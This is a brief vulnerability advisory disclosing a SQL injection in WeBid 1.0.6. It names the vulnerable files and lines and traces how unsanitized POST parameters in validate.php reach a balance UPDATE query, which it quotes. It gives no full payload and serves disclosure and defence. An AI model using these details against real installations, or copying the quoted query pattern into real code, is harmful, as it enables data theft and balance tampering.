WeBid SQL Injection Exploit

Summary

WeBid 1.0.6 is prone to a SQL injection vulnerability

Credit:

Details

Vulnerable Systems:
 * WeBid 1.0.6

Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file

Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to ‘Y’
The unsanitized parameters are using in an UPDATE query:
$query = ‘UPDATE ‘ . $DBPrefix . ‘users SET balance = balance + ‘ . $payment_amount . $addquery . ‘ WHERE id = ‘ . $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.

Disclosure Timeline:
Published: 2013-01-09

Categories: Exploits